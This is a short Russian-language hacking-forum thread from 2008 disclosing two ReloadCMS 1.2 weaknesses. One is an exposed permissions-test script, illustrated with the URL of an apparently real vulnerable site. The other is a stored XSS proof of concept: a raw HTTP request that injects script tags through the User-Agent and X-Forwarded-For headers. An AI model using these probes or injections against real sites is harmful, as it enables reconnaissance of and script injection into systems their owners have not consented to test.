Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS ReloadCMS (просмотр директорий и прав на запись)

   

Опции темы

Поиск в этой теме

Опции просмотра

ReloadCMS (просмотр директорий и прав на запись)   #1   17.12.2008, 09:24 USAkid Участник форума Регистрация: 17.06.2008 Сообщений: 214 Провел на форуме: 964766 Репутация: 228 ReloadCMS (просмотр директорий и прав на запись) ReloadCMS (просмотр директорий и прав на запись) Уязвимый продукт: ReloadCMS 1.2.* (более не тестировал) CMS без MySQL. Хороший способ, чтобы узнать где какие права стоят. Example: Код: http://site.com/path_to_cms/tools/rights_test.php Немного погуглив нашел пример такого сайта: Код: http://ziggyred.com/test/tools/rights_test.php   USAkid Посмотреть профиль Репутация Отправить личное сообщение для USAkid Найти все сообщения от USAkid Добавить в друзья   #2   17.12.2008, 11:59 [Raz0r] Members of Antichat - Level 5 Регистрация: 25.02.2007 Сообщений: 495 Провел на форуме: 3244717 Репутация: 1980 это не баг, это фича (c) =) Вот еще активная XSS (в статистике сайта): Код: GET / HTTP/1.0 User-Agent: <script>alert()</script> X-Forwarded-For: <script>alert()</script> Host: localhost Connection: close __________________ <? Raz0r.name — блог о web-безопасности   [Raz0r] Посмотреть профиль Репутация Отправить личное сообщение для [Raz0r] Посетить домашнюю страницу [Raz0r] Найти все сообщения от [Raz0r] Добавить в друзья

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход Мой кабинет Личные сообщения Подписки Кто на форуме Поиск по форуму Главная страница форума ИНФО     Мировые новости     Статьи         Авторские статьи         Чужие Статьи Безопасность и Уязвимости     Избранное     Уязвимости         Сценарии/CMF/СMS         Форумы         Расшифровка хешей         E-Mail         ICQ         Чаты     Безопасность         *nix         Soft - *nix         Windows         Soft - Windows         Анонимность         АнтиАдмин         Защита ОС: вирусы, антивирусы, файрволы.     Электроника и Фрикинг         Новости мира "железа"         Сотовый фрикинг         Аппаратное обеспечение         Схемы и программы         Телефония и связь         Беспроводные технологии/WPAN/WLAN     Администрирование         *nix системы         Windows системы         AntiDDos - АнтиДДОС     Проверка на уязвимости Программирование     PHP, PERL, MySQL, JavaScript         ПО для Web разработчика     С/С++, C#, Delphi, .NET, Asm     Реверсинг SЕО/Финансовые задачи/Социальные сети     SЕО - тонкости, методы раскрутки         Партнерки         Услуги, Покупка и Продажа в SEO         Платежные системы: Webmoney, Yandex Деньги, РБК Деньги и т. д.         Белые методы раскрутки         Черные методы раскрутки         Обсуждение Ваших сайтов         Статьи     Покупка, Продажа, Обмен         Разное - Покупка, продажа, обмен         VPN, Proxy, Socks - Покупка, продажа         Хостинг, Dedicated, VDS, Сервера - Покупка, продажа         Инвайты, mails, базы - Покупка, продажа         Доступы, shells, ftp - Покупка, продажа         Мобильная связь, СМС - Покупка, продажа         Трафик, лоады, инсталлы, загрузки - Покупка, продажа         О Работе         Покупка, продажа, услуги в Соц. Сетях         ICQ - Покупка, продажа     Социальные сети         Покупка, продажа, услуги в Соц. Сетях     Хостинги - Hostings Оффтоп     Болталка     Forum for discussion of ANTICHAT     Квесты         Antichat's Quest Antichat     Правила форума     Новости форума     Video.Antichat         Комментарии к видео